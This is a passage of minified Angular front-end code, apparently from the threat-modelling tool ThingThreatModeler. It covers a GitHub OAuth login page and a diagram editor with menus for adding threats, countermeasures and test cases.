.as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.title[_ngcontent-%COMP%]{margin-top:5%;margin-left:12.5%}.column[_ngcontent-%COMP%]{float:left;width:50%}.first-column-content[_ngcontent-%COMP%]{padding-top:30px;margin-left:25%}.second-column-content[_ngcontent-%COMP%]{padding-top:30px;margin-right:25%}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.astext[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:large}.iconBtn[_ngcontent-%COMP%]{width:20px;height:20px;line-height:20px}.exportBtn[_ngcontent-%COMP%] .mat-badge-content{right:-1px!important}.importBtn[_ngcontent-%COMP%] .mat-badge-content{right:-1px!important}#project[_ngcontent-%COMP%] .show-on-hover[_ngcontent-%COMP%]{visibility:hidden}#project[_ngcontent-%COMP%]:hover .show-on-hover[_ngcontent-%COMP%]{visibility:visible}.paginator[_ngcontent-%COMP%]{background:transparent}.paginator[_ngcontent-%COMP%] .mat-paginator-container{justify-content:left;min-height:auto;padding:0}.paginator[_ngcontent-%COMP%] .mat-paginator-range-label{margin:0 24px 0 0}#config[_ngcontent-%COMP%] .show-on-hover[_ngcontent-%COMP%]{visibility:hidden}#config[_ngcontent-%COMP%]:hover .show-on-hover[_ngcontent-%COMP%]{visibility:visible}.videoContainer[_ngcontent-%COMP%]{position:relative;width:100%;max-width:600px;padding-top:56.25%;margin-bottom:20px}.video[_ngcontent-%COMP%]{position:absolute;inset:0;width:100%;height:100%}.expansion-panel-headers-align[_ngcontent-%COMP%] mat-expansion-panel[_ngcontent-%COMP%]{max-width:600px}']}),t})()}];let MZ=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(Pct),Ms]}),t})();const Oct=[{path:"",redirectTo:"home",pathMatch:"full"},{path:"**",component:oct}];let Nct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Ms.forRoot(Oct,{relativeLinkResolution:"legacy"}),MZ,Ms]}),t})();class Lct{constructor(a,e="/assets/i18n/",i=".json"){this.http=a,this.prefix=e,this.suffix=i}getTranslation(a){return this.http.get(`${this.prefix}${a}${this.suffix}`)}}let zct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,MZ]}),t})();function Wct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step1.title"))}function Fct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step2.title"))}function Vct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step3.title"))}function Bct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"h1",15),he("click",function(){return be(e),Me(V().onGithubLogin())}),s(3),oe(4,"translate"),m(5,"mat-icon"),s(6,"open_in_new"),u()(),s(7,"\n "),m(8,"mat-checkbox",16),he("ngModelChange",function(n){return be(e),Me(V().dataService.KeepUserSignedIn=n)}),s(9),oe(10,"translate"),u(),s(11,"\n "),m(12,"h3",17),he("click",function(){return be(e),Me(V().dataService.GuestLogin())}),s(13),oe(14,"translate"),u(),s(15,"\n "),Mt()}if(2&t){const e=V();g(2),Ct("login-hover-light",!e.theme.IsDarkMode)("login-hover-dark",e.theme.IsDarkMode),g(1),ct("",re(4,12,"pages.login.loginViaGithub")," "),g(5),F("ngModel",e.dataService.KeepUserSignedIn),g(1),ke(re(10,14,"pages.login.keep_signed_in")),g(3),Ct("login-hover-light",!e.theme.IsDarkMode)("login-hover-dark",e.theme.IsDarkMode),g(1),ke(re(14,16,"pages.login.loginAsGuest"))}}function Hct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"h1"),s(3),oe(4,"translate"),u(),s(5,"\n\n "),m(6,"button",9),he("click",function(){return be(e),Me(V().dataService.LogOut())}),s(7,"\n Logout\n "),u(),s(8,"\n "),Mt()}if(2&t){const e=V();g(3),za("",re(4,2,"pages.login.welcome")," ",e.dataService.UserDisplayName,"!")}}const Uct=[{path:"login",component:(()=>{class t{constructor(e,i,n,r){this.theme=e,this.route=i,this.dataService=n,this.electronService=r}ngOnInit(){this.electronService.isElectron?this.electronService.ipcRenderer.on("oncode",(e,i)=>{this.dataService.LogIn(i)}):this.route.queryParams.subscribe(e=>{null!=e.code&&this.dataService.LogIn(e.code)})}onInstallAppClick(){window.open("https://github.com/apps/thingthreatmodeler","_blank")}onForkDataClick(){window.open("https://github.com/SecSimon/TTM-data","_blank")}onGithubLogin(){this.electronService.isElectron?window.open("https://github.com/login/oauth/authorize?client_id=Iv1.6824f14edcb01831&redirect_uri=http://localhost:4200/login","_self"):window.open("https://github.com/login/oauth/authorize?client_id=Iv1.6824f14edcb01831&redirect_uri="+window.location.href.toString(),"_self")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Tl),Ee(Yi),Ee(ST))},t.\u0275cmp=Wt({type:t,selectors:[["app-login"]],decls:111,vars:37,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/login",2,"width","100%","height","100%"],[1,"column","vertical-center"],[3,"innerHTML"],["orientation","vertical"],["stepper",""],["matStepLabel",""],["mat-button","",3,"click"],["mat-button","","matStepperNext",""],["mat-button","","matStepperPrevious",""],["mat-button","",3,"routerLink"],[1,"vertical-center-right"],[4,"ngIf"],[1,"login",2,"margin-bottom","10px",3,"click"],["color","primary",2,"margin-left","10px",3,"ngModel","ngModelChange"],[1,"login",2,"margin-top","25px",3,"click"]],template:function(e,i){1&e&&(s(0,"\n\n"),m(1,"div",0),s(2,"\n "),m(3,"mat-drawer-container",1),s(4,"\n "),m(5,"mat-drawer",2),s(6,"\n "),it(7,"app-side-nav",3),s(8,"\n "),u(),s(9,"\n\n "),m(10,"mat-drawer-content"),s(11,"\n "),m(12,"div"),s(13,"\n "),m(14,"div",4),s(15,"\n "),m(16,"h1"),s(17),oe(18,"translate"),u(),s(19,"\n "),it(20,"p",5),oe(21,"translate"),s(22,"\n "),m(23,"mat-stepper",6,7),s(25,"\n "),m(26,"mat-step"),s(27,"\n "),ne(28,Wct,2,3,"ng-template",8),s(29,"\n "),it(30,"p",5),oe(31,"translate"),s(32,"\n "),m(33,"div"),s(34,"\n "),m(35,"button",9),he("click",function(){return i.onForkDataClick()}),s(36,"\n Use this template\n "),m(37,"mat-icon"),s(38,"open_in_new"),u(),s(39,"\n "),u(),s(40,"\n "),u(),s(41,"\n "),m(42,"div"),s(43,"\n "),m(44,"button",10),s(45),oe(46,"translate"),u(),s(47,"\n "),u(),s(48,"\n "),u(),s(49,"\n "),m(50,"mat-step"),s(51,"\n "),ne(52,Fct,2,3,"ng-template",8),s(53,"\n "),it(54,"p",5),oe(55,"translate"),s(56,"\n "),m(57,"div"),s(58,"\n "),m(59,"button",9),he("click",function(){return i.onInstallAppClick()}),s(60,"\n Install\n "),m(61,"mat-icon"),s(62,"open_in_new"),u(),s(63,"\n "),u(),s(64,"\n "),u(),s(65,"\n "),m(66,"div"),s(67,"\n "),m(68,"button",11),s(69),oe(70,"translate"),u(),s(71,"\n "),m(72,"button",10),s(73),oe(74,"translate"),u(),s(75,"\n "),u(),s(76,"\n "),u(),s(77,"\n "),m(78,"mat-step"),s(79,"\n "),ne(80,Vct,2,3,"ng-template",8),s(81,"\n "),it(82,"p",5),oe(83,"translate"),s(84,"\n "),m(85,"button",9),he("click",function(){return i.onGithubLogin()}),s(86),oe(87,"translate"),u(),s(88,"\n "),m(89,"button",12),s(90),oe(91,"translate"),u(),s(92,"\n "),it(93,"br"),s(94,"\n "),u(),s(95,"\n "),u(),s(96,"\n "),u(),s(97,"\n "),m(98,"div",13),s(99,"\n "),ne(100,Bct,16,18,"ng-container",14),s(101,"\n "),ne(102,Hct,9,4,"ng-container",14),s(103,"\n "),u(),s(104,"\n "),u(),s(105,"\n "),u(),s(106,"\n "),u(),s(107,"\n "),it(108,"app-status-bar"),s(109,"\n"),u(),s(110,"\n")),2&e&&(g(14),Ct("first-column-light",!i.theme.IsDarkMode)("first-column-dark",i.theme.IsDarkMode),g(3),ke(re(18,17,"pages.login.create_acc")),g(3),F("innerHTML",re(21,19,"pages.login.pretexthtml"),Uc),g(10),F("innerHTML",re(31,21,"pages.login.step1.deschtml"),Uc),g(15),ke(re(46,23,"tour.next")),g(9),F("innerHTML",re(55,25,"pages.login.step2.deschtml"),Uc),g(15),ke(re(70,27,"tour.prev")),g(4),ke(re(74,29,"tour.next")),g(9),F("innerHTML",re(83,31,"pages.login.step3.deschtml"),Uc),g(4),ct("\n ",re(87,33,"pages.login.loginViaGithub"),"\n "),g(3),F("routerLink","/home"),g(1),ct("\n ",re(91,35,"pages.login.goToProjects"),"\n "),g(10),F("ngIf",!i.dataService.IsLoggedIn),g(2),F("ngIf",i.dataService.IsLoggedIn))},dependencies:[Ri,Ta,Ea,oa,_u,gu,Nd,br,da,YV,mA,JV,fye,pye,pf,_f,x1,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column[_ngcontent-%COMP%]{float:left;width:50%;padding-left:10px;padding-right:10px;justify-content:center;align-items:center}.first-column-light[_ngcontent-%COMP%]{border-right-color:#000;border-right-style:solid;border-right-width:1px}.first-column-dark[_ngcontent-%COMP%]{border-right-color:#fff;border-right-style:solid;border-right-width:1px}.vertical-center[_ngcontent-%COMP%]{margin:0;position:absolute;top:50%;transform:translateY(-50%)}.vertical-center-right[_ngcontent-%COMP%]{margin:0;position:absolute;top:50%;left:75%;transform:translate(-50%,-50%)}.login[_ngcontent-%COMP%]{border-radius:10px;padding:10px}.login-hover-light[_ngcontent-%COMP%]:hover{background-color:#0000000d}.login-hover-dark[_ngcontent-%COMP%]:hover{background-color:#ffffff0d}"]}),t})()}];let qct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(Uct),Ms]}),t})(),Gct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,qct]}),t})();const jct=[{path:"modeling",component:LG}];let vZ=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(jct),Ms]}),t})();var Ei=de(4968);const Qct=["ctxMenu"],$ct=["zoomSelect"];function Kct(t,a){if(1&t&&(fi(),it(0,"circle",69)),2&t){const e=V();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Xct(t,a){if(1&t&&(fi(),it(0,"circle",70)),2&t){const e=V();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Yct(t,a){if(1&t&&(fi(),it(0,"circle",71)),2&t){const e=V();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Jct(t,a){if(1&t&&(fi(),it(0,"circle",72)),2&t){const e=V();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}const Zct=function(){return[3,4]};function elt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=V();return Me(n.Dia.FlowArrowPosition=3==n.Dia.FlowArrowPosition?5:3)}),oe(1,"translate"),s(2,"\n "),it(3,"fa-icon",73),s(4,"\n "),u()}if(2&t){const e=V();Ct("toolBtn-Selected",kr(6,Zct).includes(e.Dia.FlowArrowPosition)),at("matTooltip",re(1,4,"pages.modeling.diagram.arrowPosBoth")),g(3),F("icon",e.faArrowsAltH)}}function tlt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",3),he("click",function(){be(e);const n=V();return Me(n.Dia.FlowArrowPosition=2==n.Dia.FlowArrowPosition?5:2)}),oe(1,"translate"),s(2,"\n "),it(3,"fa-icon",73),s(4,"\n "),u()}if(2&t){const e=V();Ct("toolBtn-Selected",2==e.Dia.FlowArrowPosition),at("matTooltip",re(1,4,"pages.modeling.diagram.arrowPosEnd")),g(3),F("icon",e.faLongArrowAltRight)}}function ilt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=V();return Me(n.Dia.BendFlow=!n.Dia.BendFlow)}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"redo"),u(),s(5,"\n "),u()}2&t&&(Ct("toolBtn-Selected",V().Dia.BendFlow),at("matTooltip",re(1,3,"pages.modeling.diagram.arrowBend")))}function alt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=V();return Me(n.Dia.ShowName=!n.Dia.ShowName)}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"text_rotation_none"),u(),s(5,"\n "),u()}2&t&&(Ct("toolBtn-Selected",V().Dia.ShowName),at("matTooltip",re(1,3,"pages.modeling.diagram.showName")))}function nlt(t,a){if(1&t){const e=Ye();m(0,"button",4),he("click",function(){return be(e),Me(V().Dia.TextIncrease())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"text_increase"),u(),s(5,"\n "),u()}if(2&t){const e=V();at("matTooltip",re(1,2,"pages.modeling.diagram.textIncrease")),F("disabled",!e.selectedElement)}}function olt(t,a){if(1&t){const e=Ye();m(0,"button",4),he("click",function(){return be(e),Me(V().Dia.TextDecrease())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"text_decrease"),u(),s(5,"\n "),u()}if(2&t){const e=V();at("matTooltip",re(1,2,"pages.modeling.diagram.textDecrease")),F("disabled",!e.selectedElement)}}function rlt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",4),he("click",function(){return be(e),Me(V().Dia.AddTestCase())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"checklist"),u(),s(5,"\n "),u()}if(2&t){const e=V();at("matTooltip",re(1,2,"pages.modeling.diagram.addTestCase")),F("disabled",!e.selectedElement)}}function slt(t,a){if(1&t){const e=Ye();m(0,"button",74),he("click",function(){return be(e),Me(V().Dia.CancelCreateFlow())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"draw"),u(),s(5,"\n "),u()}if(2&t){const e=V();at("matTooltip",re(1,2,"pages.modeling.diagram.cancelCreateFlow")),F("disabled",!e.Dia.IsCreatingFlow)}}function clt(t,a){1&t&&(m(0,"button",75),s(1,"Mnemonics"),u()),2&t&&(V(),F("matMenuTriggerFor",Ti(290)))}function llt(t,a){if(1&t){const e=Ye();m(0,"button",7),s(1,"\n "),m(2,"mat-slide-toggle",8),he("ngModelChange",function(n){const c=be(e).$implicit;return Me(V().diagram.Settings.GenerationMnemonics[c.ID]=n)})("click",function(n){return n.stopPropagation()}),s(3),u(),s(4,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(2),F("ngModel",i.diagram.Settings.GenerationMnemonics[e.ID]),g(1),ct("\n ",e.Name,"\n ")}}function dlt(t,a){if(1&t){const e=Ye();m(0,"button",7),s(1,"\n "),m(2,"mat-slide-toggle",8),he("ngModelChange",function(n){const c=be(e).$implicit;return Me(V().diagram.Settings.GenerationRules[c.ID]=n)})("click",function(n){return n.stopPropagation()}),s(3),u(),s(4,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(2),F("ngModel",i.diagram.Settings.GenerationRules[e.ID]),g(1),ct("\n ",e.Name,"\n ")}}function mlt(t,a){if(1&t&&(m(0,"option",76),s(1),oe(2,"number"),u()),2&t){const e=V();F("value",e.Zoom),g(1),ct("",function $k(t,a,e,i){const n=t+22,r=bi(),c=Lc(r,n);return ZC(r,n)?qk(r,fs(),a,c.transform,e,i,c):c.transform(e,i)}(2,2,100*e.Zoom,"1.0-0"),"%")}}function ult(t,a){if(1&t&&(m(0,"span",84),s(1),u()),2&t){const e=V(2).item;g(1),ke(e.GetProperty("Name"))}}function hlt(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){return be(e),Me(V(3).Dia.AddTestCase())}),s(1,"\n "),m(2,"mat-icon"),s(3,"checklist"),u(),s(4,"\n "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n "),u()}2&t&&(g(6),ke(re(7,1,"pages.modeling.diagram.addTestCase")))}function flt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,ult,2,1,"span",80),s(3," \n "),m(4,"button",81),he("click",function(){return be(e),Me(V(2).Dia.CopyElement())}),s(5,"\n "),m(6,"mat-icon"),s(7,"content_copy"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",82),he("click",function(){return be(e),Me(V(2).Dia.PasteElement())}),s(15,"\n "),m(16,"mat-icon"),s(17,"content_paste"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),m(24,"button",81),he("click",function(){be(e);const n=V().item;return Me(V().Dia.OnDeleteElement(n))}),s(25,"\n "),m(26,"mat-icon"),s(27,"delete"),u(),s(28,"\n "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n "),u(),s(33,"\n "),m(34,"button",81),he("click",function(){return be(e),Me(V(2).Dia.AddThreat())}),s(35,"\n "),m(36,"mat-icon"),s(37,"flash_on"),u(),s(38,"\n "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n "),u(),s(43,"\n "),ne(44,hlt,9,3,"button",83),s(45,"\n "),m(46,"button",81),he("click",function(){return be(e),Me(V(2).Dia.AddCountermeasure())}),s(47,"\n "),m(48,"mat-icon"),s(49,"security"),u(),s(50,"\n "),m(51,"span"),s(52),oe(53,"translate"),u(),s(54,"\n "),u(),s(55,"\n "),m(56,"button",81),he("click",function(){return be(e),Me(V(2).Dia.SendToBack())}),s(57,"\n "),fi(),m(58,"svg",10),s(59,"\n "),s(60,"\n "),it(61,"rect",29),s(62,"\n "),it(63,"rect",30),s(64,"\n "),it(65,"rect",31),s(66,"\n "),it(67,"rect",32),s(68,"\n "),it(69,"rect",33),s(70,"\n "),u(),s(71,"\n "),ln(),m(72,"span"),s(73),oe(74,"translate"),u(),s(75,"\n "),u(),s(76,"\n "),m(77,"button",81),he("click",function(){return be(e),Me(V(2).Dia.SendBackwards())}),s(78,"\n "),fi(),m(79,"svg",10),s(80,"\n "),s(81,"\n "),it(82,"rect",34),s(83,"\n "),it(84,"rect",35),s(85,"\n "),it(86,"rect",36),s(87,"\n "),u(),s(88,"\n "),ln(),m(89,"span"),s(90),oe(91,"translate"),u(),s(92,"\n "),u(),s(93,"\n "),m(94,"button",81),he("click",function(){return be(e),Me(V(2).Dia.BringForward())}),s(95,"\n "),fi(),m(96,"svg",10),s(97,"\n "),s(98,"\n "),it(99,"rect",35),s(100,"\n "),it(101,"rect",36),s(102,"\n "),it(103,"rect",34),s(104,"\n "),u(),s(105,"\n "),ln(),m(106,"span"),s(107),oe(108,"translate"),u(),s(109,"\n "),u(),s(110,"\n "),m(111,"button",81),he("click",function(){return be(e),Me(V(2).Dia.BringToFront())}),s(112,"\n "),fi(),m(113,"svg",10),s(114,"\n "),s(115,"\n "),it(116,"rect",30),s(117,"\n "),it(118,"rect",31),s(119,"\n "),it(120,"rect",32),s(121,"\n "),it(122,"rect",33),s(123,"\n "),it(124,"rect",37),s(125,"\n "),u(),s(126,"\n "),ln(),m(127,"span"),s(128),oe(129,"translate"),u(),s(130,"\n "),u(),s(131,"\n "),it(132,"mat-divider"),s(133,"\n "),Mt()}if(2&t){const e=V().item,i=V();g(2),F("ngIf",e),g(8),ke(re(11,36,"general.Copy")),g(4),F("disabled",!i.Dia.CanCopy),g(6),ke(re(21,38,"general.Paste")),g(10),ke(re(31,40,"pages.modeling.diagram.deleteElement")),g(10),ke(re(41,42,"pages.modeling.diagram.addAttackScenario")),g(4),F("ngIf",i.dataService.Project.HasTesting),g(8),ke(re(53,44,"pages.modeling.diagram.addCountermeasure")),g(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected)),g(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(4),ke(re(74,46,"pages.modeling.diagram.sendBack")),g(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected)),g(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(4),ke(re(91,48,"pages.modeling.diagram.sendBackwards")),g(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(4),ke(re(108,50,"pages.modeling.diagram.bringForward")),g(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),g(4),ke(re(129,52,"pages.modeling.diagram.bringFront"))}}function plt(t,a){if(1&t){const e=Ye();s(0,"\n "),ne(1,flt,134,54,"ng-container",77),s(2,"\n "),m(3,"button",78),he("click",function(){return be(e),Me(V().Dia.SaveImage())}),s(4,"\n "),m(5,"mat-icon"),s(6,"save"),u(),s(7,"\n "),m(8,"span"),s(9),oe(10,"translate"),u(),s(11,"\n "),u(),s(12,"\n "),m(13,"mat-menu",null,79),s(15,"\n "),m(16,"button",7),s(17,"\n "),m(18,"mat-slide-toggle",8),he("ngModelChange",function(n){return be(e),Me(V().Dia.SaveImageWithGrid=n)})("click",function(n){return n.stopPropagation()}),s(19),oe(20,"translate"),u(),s(21,"\n "),u(),s(22,"\n "),u(),s(23,"\n ")}if(2&t){const e=Ti(14),i=V();g(1),F("ngIf",i.selectedElement),g(2),F("matMenuTriggerFor",e),g(6),ke(re(10,5,"pages.modeling.diagram.saveImage")),g(9),F("ngModel",i.Dia.SaveImageWithGrid),g(1),ct("\n ",re(20,7,"pages.modeling.diagram.saveImageWithGrid"),"\n ")}}const _lt=function(){return[.33,.5,.66,.75,1,1.5,2,2.5,3]};var Zs=(()=>{return(t=Zs||(Zs={})).Mouse="mouse",t.Pan="pan",t.Move="move",Zs;var t})(),gf=(()=>{return(t=gf||(gf={}))[t.None=0]="None",t[t.Selecting=1]="Selecting",t[t.Moving=2]="Moving",gf;var t})(),ot=(()=>{return(t=ot||(ot={})).canvasID="canvasID",t.name="name",t.ID="ID",t.elementTypeID="elementTypeID",t.myType="myType",t.fa="fa",t.dfs="dfs",t.bendFlow="bendFlow",t.subTargetCheck="subTargetCheck",t.objectCaching="objectCaching",t.selectable="selectable",t.lockMovementX="lockMovementX",t.lockMovementY="lockMovementY",t.lockScalingX="lockScalingX",t.lockScalingY="lockScalingY",t.hasBorders="hasBorders",t.hasControls="hasControls",t.transparentCorners="transparentCorners",t.cornerColor="cornerColor",t.cornerSize="cornerSize",t.opacity="opacity",t.originX="originX",t.originY="originY",t._controlsVisibility="_controlsVisibility",t.path="path",t.pathOffset="pathOffset",t.strokeDashArray="strokeDashArray",t.visible="visible",t.perPixelTargetFind="perPixelTargetFind",t.targetFindTolerance="targetFindTolerance",t.fontSize="fontSize",t.p0ID="p0ID",t.p1ID="p1ID",t.p2ID="p2ID",t.arrowEID="arrowEID",t.arrowSID="arrowSID",t.textID="textID",t.textObjID="textObjID",t.t0ID="t0ID",t.flowID="flowID",t.fa1="fa1",t.fe1="fe1",t.fa2="fa2",t.fe2="fe2",ot;var t})(),wt=(()=>{return(t=wt||(wt={})).Process="P",t.DataStore="DS",t.DataStoreTop="DS-T",t.DataStoreBottom="DS-B",t.ExternalEntity="EE",t.TrustArea="TA",t.PhysicalLink="PL",t.Interface="I",t.DataFlowLine="DF-L",t.DataFlowCircle="DF-C",t.DataFlowPoint="DF-P",t.DataFlowArrowE="DF-AE",t.DataFlowArrowS="DF-AS",t.Device="DEV",t.DeviceReference="DEV-REF",t.DeviceLabel1="DEV-LBL1",t.DeviceLabel1Line="DEV-LBL1-L",t.DeviceLabel2="DEV-LBL2",t.DeviceLabel2Line="DEV-LBL2-L",t.DeviceLabel3="DEV-LBL3",t.DeviceLabel3Line="DEV-LBL3-L",t.DeviceLabel4="DEV-LBL4",t.DeviceLabel4Line="DEV-LBL4-L",t.MobileApp="APP",t.AppLabel1="APP-LBL1",t.AppLabel1Line="APP-LBL1-L",t.AppLabel2="APP-LBL2",t.AppLabel2Line="APP-LBL2-L",t.AppLabel3="APP-LBL3",t.AppLabel3Line="APP-LBL3-L",t.AppLabel4="APP-LBL4",t.AppLabel4Line="APP-LBL4-L",t.Interactor="ACT",t.InteractorHead="ACT-H",t.InteractorBody="ACT-B",t.InteractorArms="ACT-A",t.InteractorLeg1="ACT-L1",t.InteractorLeg2="ACT-L2",t.DeviceInterface="DEV-IF",t.SystemUseCase="SYSUC",t.SystemExternalEntity="SYSEE",t.Annotation="Annotation",t.ElementBorder="ElementBorder",t.ElementName="ElementName",t.ElementType="ElementType",t.ElementPhyElement="ElementPhyElement",t.FlowAnchor="FA",t.TextPosPoint="TXT-POS-P",t.GridLine="GL",wt;var 